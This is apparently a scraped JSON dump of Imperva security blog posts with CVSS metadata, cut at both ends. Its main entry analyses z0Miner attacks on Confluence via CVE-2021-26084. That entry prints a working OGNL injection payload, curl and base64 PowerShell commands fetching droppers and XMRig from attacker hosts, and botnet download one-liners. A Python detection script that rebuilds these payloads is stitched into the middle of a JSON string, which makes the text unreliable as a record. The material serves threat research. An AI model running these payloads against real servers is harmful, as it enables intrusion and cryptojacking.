We pass each event on to our analytics for better insights and recommendations to further improve your security posture.\n\n## Market Leader: Data Security\n\nSince 2020, nearly all organizations with a digital presence have migrated workflows and data to cloud-based environments to develop and innovate faster and cheaper with a largely remote workforce. As more data architectures, both on-premises and cloud-native were added, the number of tools designed to manage data security became unmanageable. The resulting set of disparate tools was supposed to offer complete data security, but in practice did not.\n\n[Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>) is a holistic, collaborative, and flexible solution. It is not a data security platform, rather it is a fabric that enables what is called a \u201cconvergence of platforms\u201d where organizations can \u201crapidly amalgamate disparate data security capabilities\u201d to secure data more easily and effectively. No matter where a security threat originates, the volume of an attack, or the place where an attack is being waged, your data and the architectures you use are protected.\n\nAs a market leader, Imperva\u2019s Data Security Fabric provides coverage across multi-cloud, hybrid, and on-premises environments, protects all data sources and types, across structured, semi-structured, and unstructured, and integrates with ecosystem technologies for both incident context and additional data capabilities, unifying visibility, control, automation, and insights via a single data service or dashboard.\n\n## See what the buzz is about\n\nTo learn more about these award-winning solutions, click any of the links in the post. That said, we\u2019d much rather learn about your specific needs and challenges in cybersecurity and determine if we can help. 
[Contact us](<https://www.imperva.com/contact-us/>) and let\u2019s talk.\n\nThe post [Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022](<https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-26T13:16:19", "type": "impervablog", "title": "Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T13:16:19", "id": "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "href": "https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:03:56", "description": "_This is an evolving storyline. 
\n_**_Last update: June 4, 2022_****_._**\n\nOn June 2, 2022, [Atlassian published a security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) covering all versions of Confluence Server and Data Center after 1.3.0. The advisory details a critical-severity unauthenticated remote code execution vulnerability identified as [CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). This Object-Graph Navigation Language (OGNL) injection allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAtlassian has released a patch for CVE-2022-26134 and is recommending that all Confluence customers deploy this patch immediately to bring them up [to the latest long-term version available](<https://www.atlassian.com/software/confluence/download-archives>). To track the latest information on this vulnerability, Confluence customers are [advised to follow this Jira issue](<https://jira.atlassian.com/browse/CONFSERVER-79016>).\n\nImperva [Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), [WAF Gateway](<https://www.imperva.com/products/web-application-firewall-waf/>), and [Runtime Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) customers are fully protected from CVE-2022-26134 without requiring security rule changes. This protection was validated by the Imperva product team and Imperva Threat Research. \n\nFor Confluence users who haven\u2019t updated their software or cannot update to a long-term supported version at this time, Imperva offers a [free trial of Cloud WAF](<https://www.imperva.com/free-trial/>) that can be **quickly deployed** to protect vulnerable versions of Confluence. 
\n\n**Imperva Threat Research Analysis of CVE-2022-26134 \n**Since the disclosure, Imperva Threat Research has monitored widespread scanning and attempted exploitation of this vulnerability. The uptick can be seen from our analysis below on the number of Java runtime injection attacks over the last 24 hours. \n\nWhat Imperva Threat Research has observed: \n\n\n * 680K attack attempts since June 3rd, with attack sources coming from nearly 4k unique IPs. The largest percentage of targets is located in Chile. \n * Payload analysis shows that most of the attacks are scanning attempts to find vulnerable servers. We have identified two scanning approaches:\n * Invoking the Java Runtime exec function to run the command line program **_nslookup_** against an external server owned by the attacker\n * Invoking the Confluence GeneralUtil **_setCookie_** function to set a unique cookie name and value\n * Imperva saw attempts to deploy a malicious script that operates in two stages:\n * Gains persistence by modifying the infected server\u2019s **_crontab_**\n * Downloads an executable file, runs it, and deletes it from the file system. The malicious file\u2019s goal is to infect the victim server with the Mirai botnet. \n * Imperva Threat Research is seeing many attempts to exfiltrate sensitive data (e.g., a dump of the **/etc/passwd** file) \n\n\n**Try Imperva for Free \n**Protect your business from vulnerabilities like CVE-2022-26134 and others for free for 30 days. [Click here](<https://www.imperva.com/free-trial/>) to start your free trial today. 
\n\nThe post [Imperva Customers are protected from Atlassian Confluence CVE-2022-26134](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T22:05:24", "type": "impervablog", "title": "Imperva Customers are protected from Atlassian Confluence CVE-2022-26134", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-04T22:05:24", "id": "IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "href": "https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. 
The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. 
Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. 
The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVE\u2019s activity in Imperva Attack Analytics. Also, given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. 
Today, you shouldn\u2019t depend on your developers to build water-tight web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": 
"https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of insecure handling of OGNL (Object-Graph Navigation Language) expressions on affected Confluence servers.\n\nSoon after the publication, various PoCs/exploits were published online; at the time of writing this blog there are 32 GitHub repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above, we were able to detect payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker uses the same methodology to exploit a vulnerable Confluence Server.\n\n * The attacker determines the target operating system and downloads Linux shell/Windows PowerShell dropper scripts from a remote C&C server, writing them to a writable location on the affected system (under /tmp on Linux and under the $env:TMP path on Windows).\n * The attacker executes the downloaded dropper scripts.\n * The dropper scripts perform the following actions to download, install and execute the XMRig crypto-mining files: \n * Removal of competing crypto-mining processes and their related files.\n * Establishing 
persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager') .newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \nvar cmd = new java.lang.String("curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\nFrom the sample above we see the attacker is attempting to determine the vulnerable server operating system by calling java.lang.System.getProperty("os.name"):\n\nOnce the operating system is determined, a file is downloaded from a remote source by either using curl as can be seen in the example above or by powershell:\n\nDownload of a Linux Shell dropper script: \nvar cmd = new java.lang.String("**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**");\n\nDownload of a Windows Powershell dropper script: \nvar cmd = new java.lang.String(**"powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo 
\nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw \nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="**);\n\nThe PowerShell payload is base64-encoded (the -enc argument is base64 of the UTF-16LE script text); decoded, it is the following one-liner, which downloads the sys.ps1 file: \nIEX (New-Object System.Net.Webclient).DownloadString('hxxp://27.1.1.34:8080/docs/s/sys.ps1')\n\nShell dropper script: \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg \nPost-exploitation clean-up scripts, linked from the dropper, that remove all traces of the dropper script mentioned above: \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kg.txt -o /tmp/.solrx \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kk.txt -o /tmp/.solrx \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kill.sh -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using a payload similar to the one found in the vulnerable querystring parameter shown above.\n\nBelow is one example where, again, the attacker uses a different code-execution command depending on the operating system detected on the affected server: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager \n').newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \n**var cmd = new java.lang.String("bash /tmp/.solrg**");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\n### Dropper Script Analysis\n\nAs mentioned 
earlier, the first part of the dropper scripts removes competing crypto-mining processes and their related files.\n\nOn Linux systems / On Windows systems: script excerpts for this step are not reproduced in this text.\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malware (pastebin).\n\nOn Linux systems / On Windows systems: script excerpts for this step are not reproduced in this text.\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nFinally, the script starts XMRig mining; execution of the post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script, which in turn executes solrd, the XMRig miner binary that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function, Update($url,$path,$proc_name), that performs file downloads via the DownloadFile method of a System.Net.WebClient object and is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = "hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe" \n$miner_name = "javae" \n$miner_path = "$env:TMP\\javae.exe" \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = "hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json" \n$miner_cfg_name = "config.json" \n$miner_cfg_path = "$env:TMP\\config.json" 
\n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = "hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat" \n$killmodule_name = "clean.bat" \n$killmodule_path = "$env:TMP\\clean.bat" \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders. \nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to that function. \nNext it sets the System File, Hidden File and Read-Only attributes on the newly downloaded miner files, and starts the miner process.\n\nThe last step is executing the clean-up batch script and terminating the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTPs (tactics, techniques and procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed, including downloaders, payloads, configuration, C&C servers and more, we identified a known threat actor tied to previous attack campaigns going back as far as March 2021.\n\nThe C&C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet. 
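
The request payloads quoted above (the curl fetch on Linux, the `powershell -enc` stager on Windows) are what a WAF or reverse-proxy log actually contains, URL-encoded. What follows is an added Python example, not Imperva's code or a component of any product named on this page: it URL-decodes one request body, flags the CVE-2021-26084 OGNL injection by its `queryString=...'+{Class.forName('javax.script.ScriptEngineManager')` shape, pulls out the command string passed to `java.lang.String`, decodes a `powershell -enc` argument (base64 of UTF-16LE text), and returns the download URLs defanged in the same `hxxp://27[.]1[.]1[.]34[:]8080` style used above. The sample request bodies are constructed here to mirror the observed payloads; the function names, and the assumption that you have the raw form-encoded body rather than only an access-log line (which would not include a POST body), are mine.

```python
import base64
import re
from urllib.parse import quote, unquote_plus

# Markers of the CVE-2021-26084 OGNL injection seen in the queryString
# parameter above: a quote break into an OGNL expression that instantiates
# a JavaScript ScriptEngine in order to reach java.lang.ProcessBuilder.
OGNL_MARKERS = (
    "queryString=",
    "'+{",
    "Class.forName('javax.script.ScriptEngineManager')",
    ".getEngineByName('JavaScript')",
)

# The OS-specific command handed to ProcessBuilder is wrapped as
# new java.lang.String("...") in every observed payload.
CMD_RE = re.compile(r'new java\.lang\.String\("([^"]*)"\)')

# powershell -enc / -EncodedCommand takes base64 of the script as UTF-16LE.
ENC_RE = re.compile(r'powershell(?:\.exe)?\s+-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', re.I)

# Download targets of curl / wget / DownloadString: scheme, host[:port], path.
URL_RE = re.compile(r"""https?://[A-Za-z0-9.\-]+(?::\d+)?/[^\s'")]*""")


def decode_encoded_powershell(b64):
    """Reverse `powershell -enc`: base64 -> UTF-16LE bytes -> script text."""
    return base64.b64decode(b64).decode('utf-16le')


def defang(url):
    """hxxp scheme and bracketed dots/colon in the host, as in the IOCs above."""
    scheme, rest = url.split('://', 1)
    host, slash, path = rest.partition('/')
    host = host.replace('.', '[.]').replace(':', '[:]')
    return scheme.replace('http', 'hxxp') + '://' + host + slash + path


def analyze_request_body(body):
    """Triage one URL-encoded request body (WAF log, PCAP, proxy log).

    Returns None when the body carries no OGNL injection; otherwise the
    commands the payload would run, any decoded PowerShell stager, and a
    de-duplicated, defanged list of download URLs to block or hunt for.
    """
    decoded = unquote_plus(body)
    if not all(marker in decoded for marker in OGNL_MARKERS):
        return None
    commands = CMD_RE.findall(decoded)
    stagers, urls = [], []
    for cmd in commands:
        enc = ENC_RE.search(cmd)
        if enc:
            stager = decode_encoded_powershell(enc.group(1))
            stagers.append(stager)
            urls.extend(URL_RE.findall(stager))
        urls.extend(URL_RE.findall(cmd))
    return {
        'os_fingerprinting': 'os.name' in decoded,
        'commands': commands,
        'decoded_powershell': stagers,
        'iocs': sorted({defang(u) for u in urls}),
    }


# ---- constructed samples (not captured traffic) -------------------------

def observed_payload_shape(cmd):
    """Shape of the payload quoted above, with the command slotted in.
    Used only to build test input that looks like what the server logs."""
    return (
        "queryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager')"
        ".newInstance().getEngineByName('JavaScript').eval('"
        "var isWin = java.lang.System.getProperty(\"os.name\").toLowerCase().contains(\"win\");"
        "var cmd = new java.lang.String(\"" + cmd + "\");"
        "var p = new java.lang.ProcessBuilder();"
        "if(isWin){p.command(\"cmd.exe\", \"/c\", cmd);} else{p.command(\"bash\", \"-c\", cmd);}"
        "p.start();')}+'"
    )


# The stager the base64 blob above decodes to; re-encoded here the way -enc expects.
PS_STAGER = ("IEX (New-Object System.Net.Webclient)"
             ".DownloadString('http://27.1.1.34:8080/docs/s/sys.ps1')")
PS_B64 = base64.b64encode(PS_STAGER.encode('utf-16le')).decode('ascii')

SAMPLE_BODIES = {
    # ordinary Confluence request: no OGNL, must not alert
    'benign': quote('queryString=pageTitle&spaceKey=DOCS', safe='=&'),
    # Linux dropper fetch from the payload quoted above
    'linux_dropper': quote(observed_payload_shape(
        'curl -fsSL http://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg'), safe='=&'),
    # Windows dropper fetch via encoded PowerShell
    'windows_dropper': quote(observed_payload_shape('powershell -enc ' + PS_B64), safe='=&'),
}

if __name__ == '__main__':
    for name, body in SAMPLE_BODIES.items():
        print(name, analyze_request_body(body))
```

Run it as-is to print the triage for the three samples; in a pipeline, feed `analyze_request_body` each logged body and forward the `iocs` list to your blocklist. The marker check is deliberately strict (all four fragments must be present) so ordinary Confluence requests that merely contain `queryString=` do not alert; loosen it if you want to catch variants that reach `ProcessBuilder` through a different script engine.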
\nz0Miner is a malicious mining family that became active in 2020 and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle WebLogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), using the same methodology as described above to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an Elasticsearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IoT Botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers will rush to exploit affected systems for their own gain. RCE vulnerabilities allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 was publicly disclosed, the Imperva Threat Research team immediately began their research on creating a mitigation. 
It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new 
